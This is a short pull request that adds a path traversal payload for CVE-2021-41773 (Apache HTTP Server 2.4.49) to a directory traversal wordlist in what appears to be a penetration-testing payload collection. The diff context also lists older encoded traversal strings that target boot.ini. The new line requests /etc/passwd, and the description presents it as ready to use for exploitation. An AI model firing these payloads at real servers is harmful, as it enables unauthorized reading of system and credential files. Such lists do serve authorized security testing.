### PR TITLE
Added CVE-2021-41773 payload

### DIFF
--- a/Directory Traversal/Intruder/directory_traversal.txt
+++ b/Directory Traversal/Intruder/directory_traversal.txt
@@ -130,3 +130,4 @@ C:\boot.ini
 /.../.../.../.../.../
 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd


### PR DESCRIPTION
This payload can be used for exploiting CVE-2021-41773 for Apache HTTP Server 2.4.49